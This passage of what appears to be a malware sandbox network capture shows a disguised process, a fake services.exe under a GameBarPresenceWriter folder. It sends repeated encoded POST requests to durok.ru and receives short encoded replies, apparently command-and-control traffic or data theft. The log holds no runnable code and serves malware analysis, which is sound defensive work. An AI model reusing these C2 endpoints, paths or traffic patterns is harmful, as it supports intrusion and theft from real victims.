Dec 26, 2024 17:17:39.536778927 CET | 2548 | OUT | (POST body)
Dec 26, 2024 17:17:40.319360971 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:17:40.569905043 CET | 796 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:40 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=STNDrYon2EVW27OfSghBQ2qAd54F%2Fci5i%2FDm0Y0SgqqskMPubjO6zqXtcvT4rBDnrG0c37MaaK8CxfPcjXseVkc%2Ftxo7fXqJYAUSraXB1qp6doT6SE3XmKC4Pw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261e1f9d48c1b-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4538&min_rtt=1978&rtt_var=5862&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=65004&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                              25          192.168.2.4  49766        104.21.93.162   80                2308  C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                                                                              Dec 26, 2024 17:17:40.809346914 CET  307                OUT        POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue


                                                                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                              26          192.168.2.4  49767        104.21.93.162   80                2308  C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                                                                              Dec 26, 2024 17:17:41.205862999 CET  331                OUT        POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:17:41.552483082 CET  2128               OUT        Data Raw: [request body, application/octet-stream]
                                                                                                                              Dec 26, 2024 17:17:42.384809017 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:42.638060093 CET  953                IN         HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:42 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SRHsLM5vGOHf02%2BkUJ%2Fx%2BVSrGma3uDHemO%2BNKvw%2Fro%2BV6bRhd1nLiSORN3vS12bHts3pazXXcLzlFcPfb9s99hlZllRnDiTWM%2FoM0eRgsYpesDmxUkgWchmqWg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261eedb884393-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3956&min_rtt=1754&rtt_var=5063&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2459&delivery_rate=75350&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: [chunked response body]


                                                                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                              27          192.168.2.4  49768        104.21.93.162   80                2308  C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                                                                              Dec 26, 2024 17:17:41.325777054 CET  331                OUT        POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:17:41.677310944 CET  2548               OUT        Data Raw: [request body, application/octet-stream]
                                                                                                                              Dec 26, 2024 17:17:42.504190922 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:42.762238979 CET  794                IN         HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:42 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z9nTs%2BiNVCBIOCgelFI0V8UoISSbUUC3plbZ7xeTtWGHWq1wT24TyYlIBaGGUJ5IKde1nu7dvEIaTK5wZZ8%2B1siP2defVf2WXrQsMinFA8nb1HjIAIi7Ywd7TQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261ef99ec1819-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4633&min_rtt=1702&rtt_var=6501&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2879&delivery_rate=58040&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                              28          192.168.2.4  49769        104.21.93.162   80                2308  C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                                                                              Dec 26, 2024 17:17:43.013623953 CET  307                OUT        POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:43.369827986 CET  2548               OUT        Data Raw: [request body, application/octet-stream]


                                                                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                              29          192.168.2.4  49770        104.21.93.162   80                2308  C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                                                                              Dec 26, 2024 17:17:43.767446995 CET  331                OUT        POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2108
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:17:44.114810944 CET  2108               OUT        Data Raw: [request body, application/octet-stream]
                                                                                                                              Dec 26, 2024 17:17:44.947308064 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:45.198000908 CET  943                IN         HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:45 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3LS1NwmDZigcEJ%2BXVuDV4aYk72KvN30wtYM%2BBvwGhZxZ6QUwlqfh3bnYb7cZ0rvL7L7wBDzSsBjIKY12acsYLySK28ZSoekIMltiWtWn16jInSNB0xt2KMOrKA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261fededf8c11-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4365&min_rtt=1995&rtt_var=5488&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2439&delivery_rate=69669&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: [chunked response body]


                                                                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                              30          192.168.2.4  49771        104.21.93.162   80                2308  C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                                                                              Dec 26, 2024 17:17:43.903995037 CET  331                OUT        POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:17:44.261104107 CET  2548               OUT        Data Raw: [request body, application/octet-stream]
                                                                                                                              Dec 26, 2024 17:17:44.520920038 CET  1236               OUT        Data Raw: [request body, application/octet-stream]
                                                                                                                              Dec 26, 2024 17:17:45.081871033 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:45.338087082 CET  793                IN         HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:45 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3RT%2BpoARvu66YYdqvkHolmFy0Unn0U0UeGS809XHenyFSBcxQXl0uY0CPpBu319E1alkgmqChUNhlmmSbO2wA8Vp3DNfCz254iqLtVmjAAyVaW7Yb8BRIHLf2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261ffbeef5e71-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=6681&min_rtt=1764&rtt_var=10496&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2879&delivery_rate=35521&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                              31          192.168.2.4  49772        104.21.93.162   80                2308  C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                                                                              Dec 26, 2024 17:17:45.757461071 CET  307                OUT        POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:46.114794016 CET  2548               OUT        Data Raw: [request body, application/octet-stream]
                                                                                                                              Dec 26, 2024 17:17:46.937822104 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:47.189898014 CET  805                IN         HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:46 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RehnYcQihK32L48Zc7OtMzNRgz%2FXioi6Gbfyn9%2BZHPOqo8scQKfkI%2FMcd%2Bt%2BcaHKIlhTse2tU%2BMxFgtT3bLLYgr6aFZqOQp4UtNi%2BLETlriVLH6dZNaJuwbwGA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82620b5f649e17-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3445&min_rtt=1987&rtt_var=3661&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=106936&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                               32 | 192.168.2.4 | 49773 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                                                                               Dec 26, 2024 17:17:46.330280066 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                               Dec 26, 2024 17:17:46.677308083 CET | 2128 | OUT | Data Raw: 59 51 5e 5d 54 5b 5c 56 5e 58 52 54 56 5c 58 56 54 50 5b 59 56 51 53 54 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YQ^]T[\V^XRTV\XVTP[YVQSTPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'<4Z("!" X,X&)&Z3#,U 2-:B<3 *"Z.#Z*2
                                                                                                                               Dec 26, 2024 17:17:47.507642984 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                               Dec 26, 2024 17:17:47.762006998 CET | 951 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:47 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GH4trDAJkoJNlZnPUPbXXF6%2BCbHjBg7hXRkmOK83olUjJDSyzFn%2FxXNO%2Fqn5Nj8%2FyVJEM7vFcQCubWc%2Bsw%2B9RUTdcoNDku7RBQ5knRzfW2wXZQBmq6PKfjMukA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82620eec5e0f75-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4169&min_rtt=1721&rtt_var=5543&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=68509&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 58 2a 17 0d 50 23 05 28 56 2b 3d 2a 19 28 32 32 06 3c 1c 32 07 2b 01 25 0a 28 2b 28 0a 37 5c 31 05 29 29 3c 10 26 35 39 00 31 0b 2e 5c 05 1d 27 5f 2b 3b 33 02 27 22 3e 00 2b 3e 3a 40 29 00 18 05 24 01 23 58 23 15 3d 04 37 31 24 58 2c 05 37 02 2d 02 01 06 2b 30 0f 04 21 07 21 51 0c 1f 38 56 21 17 28 07 27 3e 21 54 20 30 3f 12 25 28 22 10 21 2b 37 50 26 2a 27 5b 32 20 3b 54 23 2e 27 1f 2b 2e 3e 5f 32 11 3d 5d 29 39 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$X*P#(V+=*(22<2+%(+(7\1))<&591.\'_+;3'">+>:@)$#X#=71$X,7-+0!!Q8V!('>!T 0?%("!+7P&*'[2 ;T#.'+.>_2=])9%^-#T>TV0


                                                                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                               33 | 192.168.2.4 | 49774 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                                                                               Dec 26, 2024 17:17:47.437378883 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                               Dec 26, 2024 17:17:47.786729097 CET | 2548 | OUT | Data Raw: 59 5b 5e 5d 51 5c 59 53 5e 58 52 54 56 58 58 5b 54 54 5b 54 56 56 53 58 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y[^]Q\YS^XRTVXX[TT[TVVSXPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'(24[<=W"T;8>%$'X7<? Z2.:? _="Z.#Z*"
                                                                                                                               Dec 26, 2024 17:17:48.620069027 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                               Dec 26, 2024 17:17:48.869940996 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:48 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qzZEU6cryNaNy76CT9tXnlyd%2B3%2B4MBs%2FfI%2FDOWycBmk6gxtpC%2FcUhqlH95ESCKX4MPd5gXml%2FP9I0Rkm00oaywDJrPcmLcNVmepD%2BxtIdFQUbMbK0ZQ0gVMJvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f826215c93f0f63-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8296&min_rtt=1669&rtt_var=13880&sent=5&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=26697&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                               34 | 192.168.2.4 | 49775 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                                                                               Dec 26, 2024 17:17:48.892041922 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2116
                                                                                                                              Expect: 100-continue
                                                                                                                               Dec 26, 2024 17:17:49.239886999 CET | 2116 | OUT | Data Raw: 5c 5b 5e 5d 51 5c 59 5a 5e 58 52 54 56 59 58 54 54 53 5b 5c 56 51 53 5a 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \[^]Q\YZ^XRTVYXTTS[\VQSZPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$+1'(9"$X8X6=0+44<2Z::3(])"Z.#Z*
                                                                                                                               Dec 26, 2024 17:17:50.068927050 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                               Dec 26, 2024 17:17:50.321949005 CET | 945 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:50 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zJhhcj3LcWOqOslzEXjLp3%2BgasElfjLVMnukJw9fRzTYnFVI%2B7bKsGVJWZuHew%2Bwj6aeTtRtlbuUxbnOGHASSeOQujeITcee1S7nEQYph2F6pxyWlkWZ56LTIg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82621eebf14374-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4295&min_rtt=1671&rtt_var=5876&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2423&delivery_rate=64407&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 27 05 3e 07 0d 53 20 5a 38 55 3c 03 2e 57 3d 21 0c 05 28 1c 07 5e 3c 2c 22 53 28 38 3f 1b 21 2a 2d 03 3e 39 20 11 32 08 26 11 26 31 2e 5c 05 1d 27 5d 2b 2b 30 5f 27 31 3e 06 3e 00 26 43 3d 3d 29 5a 27 3f 05 11 21 3b 2d 06 34 0f 34 5d 2c 5a 23 07 3a 5a 3f 07 3f 23 3e 5a 22 17 21 51 0c 1f 3b 0d 36 29 01 13 25 2d 35 1d 36 30 28 0d 25 38 2d 0a 35 02 38 0c 30 5c 3f 10 26 0a 3f 53 23 2d 3c 0d 2a 2e 2e 5a 26 3f 3e 04 29 29 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98'>S Z8U<.W=!(^<,"S(8?!*->9 2&&1.\']++0_'1>>&C==)Z'?!;-44],Z#:Z??#>Z"!Q;6)%-560(%8-580\?&?S#-<*..Z&?>))%^-#T>TV0


                                                                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                               35 | 192.168.2.4 | 49776 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                                                                               Dec 26, 2024 17:17:49.107618093 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2544
                                                                                                                              Expect: 100-continue
                                                                                                                               Dec 26, 2024 17:17:49.458512068 CET | 2544 | OUT | Data Raw: 5c 5e 5e 5f 54 5c 59 57 5e 58 52 54 56 59 58 50 54 5c 5b 5b 56 52 53 5a 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \^^_T\YW^XRTVYXPT\[[VRSZPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$[(!#<_%W5,X**'>Z3'3 ,W <>9E+0Y>5"Z.#Z**
                                                                                                                               Dec 26, 2024 17:17:50.286545038 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                               Dec 26, 2024 17:17:50.537935019 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:50 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k%2ByobGb%2Bla4GhSKpnjW%2BKljPo5ifh8F4bBNyYfeQkn7rxq%2FsZd3fuS%2FPKRfHusiDutrck1PnhYys9jABgVUOrqadGInMbiLh%2FZdw6kC6IwdqL%2FiuR6tdHxo5gQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262204819426d-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
